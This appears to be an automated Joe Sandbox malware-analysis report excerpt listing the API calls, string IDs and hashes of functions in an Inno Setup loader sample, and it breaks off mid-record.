                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: InfoLocale
                                                                            • String ID:
                                                                            • API String ID: 2299586839-0
                                                                            • Opcode ID: 8ef9b48ed96d6a8df8db933101511442404bdd0abec70889978d036278c5d13e
                                                                            • Instruction ID: b78bf48cff894a3999656c5243e329942f020ab22272e2e872fdbeeaebf0035e
                                                                            • Opcode Fuzzy Hash: 8ef9b48ed96d6a8df8db933101511442404bdd0abec70889978d036278c5d13e
                                                                            • Instruction Fuzzy Hash: EDE09271B0021426D711A9699C86AEB735DDB58310F0006BFB904EB3C6EDB49E8046ED
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00408FC8 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46libraryloaderCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00409061,?,?,?,?,00000000,?,00409B53), ref: 00408FE8
                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00408FEE
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,Wow64DisableWow64FsRedirection,00000000,00409061,?,?,?,?,00000000,?,00409B53), ref: 00409002
                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00409008
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                            • API String ID: 1646373207-2130885113
                                                                            • Opcode ID: 17e7db4c528402608d9f53e260f8b79ce616995abb8d95c1af2dd02ed3ed6c5c
                                                                            • Instruction ID: 9fcc65c531327f2d7efb14c601a25e4e420c6304718e48176e9e04a6a3b299d5
                                                                            • Opcode Fuzzy Hash: 17e7db4c528402608d9f53e260f8b79ce616995abb8d95c1af2dd02ed3ed6c5c
                                                                            • Instruction Fuzzy Hash: 6701DF70208300AEEB10AB76DC47B563AA8E782714F60843BF504B22C3CA7C5C44CA2E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00409FB4 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A010
                                                                            • SetWindowLongA.USER32(00020446,000000FC,004097FC), ref: 0040A027
                                                                              • Part of subcall function 00406ADC: GetCommandLineA.KERNEL32(00000000,00406B20,?,?,?,?,00000000,?,0040A098,?), ref: 00406AF4
                                                                              • Part of subcall function 00409888: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02122C20,00409974,00000000,0040995B), ref: 004098F8
                                                                              • Part of subcall function 00409888: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02122C20,00409974,00000000), ref: 0040990C
                                                                              • Part of subcall function 00409888: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409925
                                                                              • Part of subcall function 00409888: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409937
                                                                              • Part of subcall function 00409888: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02122C20,00409974), ref: 00409940
                                                                            • RemoveDirectoryA.KERNEL32(00000000,0040A166,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A113
                                                                            • 73A15CF0.USER32(00020446,0040A166,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A127
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                            • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                            • API String ID: 978128352-3001827809
                                                                            • Opcode ID: f35d8c1ce23740e5e47570a4a7ea1aa6b0c7a4e1336b706dbfad7c34b6de0a74
                                                                            • Instruction ID: 994b03bd5abc72cbe06dd2c14f0861f5fc0fad0f3ad24bd21fe84be6bde737e4
                                                                            • Opcode Fuzzy Hash: f35d8c1ce23740e5e47570a4a7ea1aa6b0c7a4e1336b706dbfad7c34b6de0a74
                                                                            • Instruction Fuzzy Hash: 57411A70A00205DFD715EBA9EE86B9A7BA5EB84304F10427BF510B73E2DB789801DB5D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00409FD8 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 102COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 00409460: GetLastError.KERNEL32(00000000,00409503,?,0040B240,?,02122C20), ref: 00409484
                                                                            • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A010
                                                                            • SetWindowLongA.USER32(00020446,000000FC,004097FC), ref: 0040A027
                                                                              • Part of subcall function 00406ADC: GetCommandLineA.KERNEL32(00000000,00406B20,?,?,?,?,00000000,?,0040A098,?), ref: 00406AF4
                                                                              • Part of subcall function 00409888: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02122C20,00409974,00000000,0040995B), ref: 004098F8
                                                                              • Part of subcall function 00409888: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02122C20,00409974,00000000), ref: 0040990C
                                                                              • Part of subcall function 00409888: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409925
                                                                              • Part of subcall function 00409888: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409937
                                                                              • Part of subcall function 00409888: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02122C20,00409974), ref: 00409940
                                                                            • RemoveDirectoryA.KERNEL32(00000000,0040A166,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A113
                                                                            • 73A15CF0.USER32(00020446,0040A166,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A127
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryErrorExitLastLineLongMultipleObjectsRemoveWait
                                                                            • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                            • API String ID: 240127915-3001827809
                                                                            • Opcode ID: 41e9b17cc1901837085009e7774581f9f675215498936b1d5fec870b95540319
                                                                            • Instruction ID: cbbd3698a6e5ddb8e812fa6c760aedb007618753dcf5685e5a94b93d1743052f
                                                                            • Opcode Fuzzy Hash: 41e9b17cc1901837085009e7774581f9f675215498936b1d5fec870b95540319
                                                                            • Instruction Fuzzy Hash: 04412B70A00205DBC715EBA9EE86B9E3BA5EB84304F10427BF510B73E2DB789801DB5D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00409888 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77processCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02122C20,00409974,00000000,0040995B), ref: 004098F8
                                                                            • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02122C20,00409974,00000000), ref: 0040990C
                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409925
                                                                            • GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409937
                                                                            • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409980,02122C20,00409974), ref: 00409940
                                                                              • Part of subcall function 00409460: GetLastError.KERNEL32(00000000,00409503,?,0040B240,?,02122C20), ref: 00409484
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                            • String ID: D
                                                                            • API String ID: 3356880605-2746444292
                                                                            • Opcode ID: 3e364823df46f41b243604843b678d585e88c5cad38ef85377b023b87dae9783
                                                                            • Instruction ID: 0c6d97fba1df7b16fba7b9ed0c132cba9133a3324ac8f072eb64155fee6ae1b7
                                                                            • Opcode Fuzzy Hash: 3e364823df46f41b243604843b678d585e88c5cad38ef85377b023b87dae9783
                                                                            • Instruction Fuzzy Hash: AC1130B16142086EDB10FBE68C52F9EBBACEF49718F50013EB614F62C7DA785D048669
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00409D26 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117windowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409D8A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Message
                                                                            • String ID: $u@$.tmp
                                                                            • API String ID: 2030045667-236237750
                                                                            • Opcode ID: 76a7687ccf1c1f3f155fed8792e4b2e0c469f7c74cc7371f2538726c547644a2
                                                                            • Instruction ID: fbeaf51a7290a35b1d20cf1acd7fffd14229a7cea4ec7fe779b7d8bf1d8f9ef0
                                                                            • Opcode Fuzzy Hash: 76a7687ccf1c1f3f155fed8792e4b2e0c469f7c74cc7371f2538726c547644a2
                                                                            • Instruction Fuzzy Hash: 7041A170604201DFD311EF19DE92A5A7BA6FB49304B11453AF801B73E2CB79AC01DAAD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00409D41 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113windowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409D8A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Message
                                                                            • String ID: $u@$.tmp
                                                                            • API String ID: 2030045667-236237750
                                                                            • Opcode ID: 4be92c8e37dddd0a3a50cfadddd3e7ce3c10b6794e32ae209eae1f209508f25f
                                                                            • Instruction ID: 7aabf0afbc79ebbbc3d3aa4d6af75c8ddef5afe13af9357e4f9bebdf666c2db7
                                                                            • Opcode Fuzzy Hash: 4be92c8e37dddd0a3a50cfadddd3e7ce3c10b6794e32ae209eae1f209508f25f
                                                                            • Instruction Fuzzy Hash: 66418070600201DFC711EF69DE92A5A7BB6FB49304B11457AF801B73E2CB79AC01DAAD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00409254 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00409343,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040929A
                                                                            • GetLastError.KERNEL32(00000000,00000000,?,00000000,00409343,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004092A3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectoryErrorLast
                                                                            • String ID: .tmp
                                                                            • API String ID: 1375471231-2986845003
                                                                            • Opcode ID: 7647810fba1c1a7df54c129ecd6d2966c744d5805a6f131b99297333171aebfe
                                                                            • Instruction ID: 381de743b5e558d6c5ac88c9815bc56a2e764fefa580558ac3af8d983805238d
                                                                            • Opcode Fuzzy Hash: 7647810fba1c1a7df54c129ecd6d2966c744d5805a6f131b99297333171aebfe
                                                                            • Instruction Fuzzy Hash: 3C214975A002089BDB01EFE1C9429DEB7B9EB48304F10457BE901B73C2DA7CAF058AA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00406F00 Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 311 406f00-406f53 SetErrorMode call 403414 LoadLibraryA
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00008000), ref: 00406F0A
                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00406F54,?,00000000,00406F72,?,00008000), ref: 00406F39
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLibraryLoadMode
                                                                            • String ID:
                                                                            • API String ID: 2987862817-0
                                                                            • Opcode ID: 280b78466cfb49ac5d1a4d8de4e82968344a77d2278ba686a31885ea79f0a63b
                                                                            • Instruction ID: 61c75ae37e4b7eabf140846b9e9d3e90831ba1beb5fed57b889ca027c52d2016
                                                                            • Opcode Fuzzy Hash: 280b78466cfb49ac5d1a4d8de4e82968344a77d2278ba686a31885ea79f0a63b
                                                                            • Instruction Fuzzy Hash: 49F08270614704BEDB029FB69C6282BBBFCE749B0475348B6F904A26D2E53C5D208568
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004075CC Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 321 4075cc-4075f1 SetFilePointer 322 407603-407608 321->322 323 4075f3-4075fa GetLastError 321->323 323->322 324 4075fc-4075fe call 4073ec 323->324 324->322
                                                                            APIs
                                                                            • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 004075EB
                                                                            • GetLastError.KERNEL32(?,?,?,00000000), ref: 004075F3
                                                                              • Part of subcall function 004073EC: GetLastError.KERNEL32($u@,0040748A,?,?,021203AC,?,00409BAD,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 004073EF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$FilePointer
                                                                            • String ID:
                                                                            • API String ID: 1156039329-0
                                                                            • Opcode ID: 4b4e93de333a3cce642c2996d73c93b1535ff8d1f0695df8178d397978e57373
                                                                            • Instruction ID: cda5b13584bb414d1d7c0d7cef5a43535e1b929ad68122291bf656bee98e9d77
                                                                            • Opcode Fuzzy Hash: 4b4e93de333a3cce642c2996d73c93b1535ff8d1f0695df8178d397978e57373
                                                                            • Instruction Fuzzy Hash: A0E092766081016FD601D55EC881B9B33DCDFC5365F00453ABA54EB2D1D675AC0087B6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040758C Relevance: 3.0, APIs: 2, Instructions: 30fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 315 40758c-4075aa ReadFile 316 4075c3-4075ca 315->316 317 4075ac-4075b0 315->317 318 4075b2-4075ba GetLastError 317->318 319 4075bc-4075be call 4073ec 317->319 318->316 318->319 319->316
                                                                            APIs
                                                                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 004075A3
                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 004075B2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastRead
                                                                            • String ID:
                                                                            • API String ID: 1948546556-0
                                                                            • Opcode ID: 60e63bc2ff5526e1bd28c8a7098a19329bed0093cf160d1b5924f83231400461
                                                                            • Instruction ID: 6d0e635579d8ef6deec62af0acb898b5effba2491802df9b0589d4017bc118ea
                                                                            • Opcode Fuzzy Hash: 60e63bc2ff5526e1bd28c8a7098a19329bed0093cf160d1b5924f83231400461
                                                                            • Instruction Fuzzy Hash: 4FE012B1A181147AEB24965A9CC5FAB6BDCCBC5314F14847BF904DB282D678DC04877B
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00407524 Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 326 407524-407545 SetFilePointer 327 407557-407559 326->327 328 407547-40754e GetLastError 326->328 328->327 329 407550-407552 call 4073ec 328->329 329->327
                                                                            APIs
                                                                            • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 0040753B
                                                                            • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 00407547
                                                                              • Part of subcall function 004073EC: GetLastError.KERNEL32($u@,0040748A,?,?,021203AC,?,00409BAD,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 004073EF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$FilePointer
                                                                            • String ID:
                                                                            • API String ID: 1156039329-0
                                                                            • Opcode ID: 0dd762855ce75d8d861d21fe55c1929f9bb0fd02210f0b496c114b023f039fab
                                                                            • Instruction ID: cd7afd6369a15af5fc7b0f7528e30ca6696358c0ea2e6c45e94f6e0b4d50a73a
                                                                            • Opcode Fuzzy Hash: 0dd762855ce75d8d861d21fe55c1929f9bb0fd02210f0b496c114b023f039fab
                                                                            • Instruction Fuzzy Hash: 0EE04FB1600210AFEB10EEB98C81B9672DC9F48364F048576EA14DF2C6D274DC00C766
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401430 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 331 401430-40143d 332 401446-40144c 331->332 333 40143f-401444 331->333 334 401452-40146a VirtualAlloc 332->334 333->334 335 40146c-40147a call 4012e4 334->335 336 40148f-401492 334->336 335->336 339 40147c-40148d VirtualFree 335->339 339->336
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$AllocFree
                                                                            • String ID:
                                                                            • API String ID: 2087232378-0
                                                                            • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                            • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                            • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                            • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004051D0 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,00405306), ref: 004051EF
                                                                              • Part of subcall function 00404C2C: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404C49
                                                                              • Part of subcall function 0040515C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,00405227,?,00000000,00405306), ref: 0040517A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: DefaultInfoLoadLocaleStringSystem
                                                                            • String ID:
                                                                            • API String ID: 1658689577-0
                                                                            • Opcode ID: 9ea3c66d670cb0c44a2644de082ff92dfdb36693542507e19320d23b5394a13d
                                                                            • Instruction ID: c760dbbb10683706500036a577470844d35ac6ab0c013c9c95042e4326961867
                                                                            • Opcode Fuzzy Hash: 9ea3c66d670cb0c44a2644de082ff92dfdb36693542507e19320d23b5394a13d
                                                                            • Instruction Fuzzy Hash: 3B313D75E00119ABCB00EF95C8C19EEB779FF84304F158977E815BB285E739AE058B98
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004074D6 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00407518
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3215412914.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3215372684.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215441158.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3215465131.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: ce86d0b46b6749cbb1c8065cdd94f6338fa023cacd1506a2c152e65e14b54ccf
                                                                            • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                            • Opcode Fuzzy Hash: ce86d0b46b6749cbb1c8065cdd94f6338fa023cacd1506a2c152e65e14b54ccf
